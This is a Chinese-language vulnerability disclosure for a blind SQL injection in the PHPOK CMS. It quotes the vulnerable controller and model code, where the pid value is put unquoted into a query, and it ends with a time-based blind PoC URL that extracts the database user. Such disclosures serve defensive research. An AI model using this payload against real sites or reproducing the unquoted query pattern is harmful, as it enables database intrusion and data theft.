phpok最新版sql注入(盲注)

  • A+
所属分类:漏洞时代
摘要

在framework/www/open_control.php中:$pid = $this->get(“pid”); 获取参数pid的值,然后调用下面的方法


漏洞作者: 路人甲

在framework/www/open_control.php中:

//网址列表,这里读的是项目的网址列表  function url_f()  {   $id = $this->get("id");   if(!$id) $id = "content";   $this->assign("id",$id);   $pid = $this->get("pid");   if($pid)   {    $p_rs = $this->model('project')->get_one($pid);    $type = $this->get("type");    if(!$p_rs)    {     error_open("项目不存在");    }    if($type == "cate" && $p_rs["cate"])    {     $catelist = $this->model("cate")->get_all($p_rs['site_id'],$p_rs['cate']);     $this->assign("rslist",$catelist);     $this->assign("p_rs",$p_rs);     $this->view("open_url_cate");    }    else    {     $pageid = $this->get($this->config["pageid"],"int");     $psize = $this->config["psize"];     if(!$psize) $psize = 20;     if(!$pageid) $pageid = 1;     $offset = ($pageid - 1) * $psize;     $pageurl = $this->url("open","url","pid=".$pid."&type=list&id=".$id);     $condition = "l.site_id='".$p_rs["site_id"]."' AND l.project_id='".$pid."' AND l.parent_id='0' ";     $keywords = $this->get("keywords");     if($keywords)     {      $condition .= " AND l.title LIKE '%".$keywords."%' ";      $pageurl .= "&keywords=".rawurlencode($keywords);      $this->assign("keywords",$keywords);     }     $rslist = $this->model('list')->get_list($p_rs["module"],$condition,$offset,$psize,$p_rs["orderby"]);     if($rslist)     {      $sub_idlist = array_keys($rslist);      $sub_idstring = implode(",",$sub_idlist);      $con_sub = "l.site_id='".$p_rs["site_id"]."' AND l.project_id='".$pid."' AND l.parent_id IN(".$sub_idstring.") ";      $sublist = $this->model('list')->get_list($p_rs["module"],$con_sub,0,0,$p_rs["orderby"]);      if($sublist)      {       foreach($sublist AS $key=>$value)       {        $rslist[$value["parent_id"]]["sonlist"][$value["id"]] = $value;       }      }     }     //读子主题     $total = $this->model('list')->get_total($p_rs["module"],$condition);     $pagelist = phpok_page($pageurl,$total,$pageid,$psize,"home=首页&prev=上一页&next=下一页&last=尾页&half=5&opt=第(num)页&add=(total)/(psize)&always=1");     $this->assign("pagelist",$pagelist);     $this->assign("p_rs",$p_rs);     $this->assign("rslist",$rslist);     $this->view("open_url_list");        }   }   else   {    $condition = " p.status='1' ";    $rslist = $this->model('project')->get_all_project($_SESSION["admin_site_id"],$condition);    $this->assign("rslist",$rslist);   }   $this->assign("id",$id);   $this->view("open_url");  }

$pid = $this->get("pid"); 获取参数pid的值,然后调用下面的方法

$p_rs = $this->model('project')->get_one($pid);

//取得项目信息  function get_one($id,$ext=true)  {   if(!$id) return false;   $sql = "SELECT * FROM ".$this->db->prefix."project WHERE id=".$id;   $rs = $this->db->get_one($sql);   if(!$rs) return false;   if($ext)   {    $ext_rs = $GLOBALS['app']->model("ext")->get_all("project-".$id);    if($ext_rs) $rs = array_merge($ext_rs,$rs);   }   return $rs;  }

这里发现$id 虽然做了全局的过滤,但是sql语句中并没有两侧加上引号,这样过滤就没啥意义了,直接可以sql整形注入。

PS: 这里还有一个奇怪的问题,访问页面后发现一只提示模板不存在,后来发现在tpl文件夹下根本就不存在这个open_control.php中所需要的模板。导致sql注入无法回显。不知道是否是开发者忘记了还是这个模块已经取消了。

漏洞证明:

poc:

[php]

/index.php?c=open&f=url&pid=0%20or%20if%28ord%28substr%28user%28%29%2C1%2C1%29%29%3D1%2Csleep%28%200.5%29%2C1%29%3D0

[/php]

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: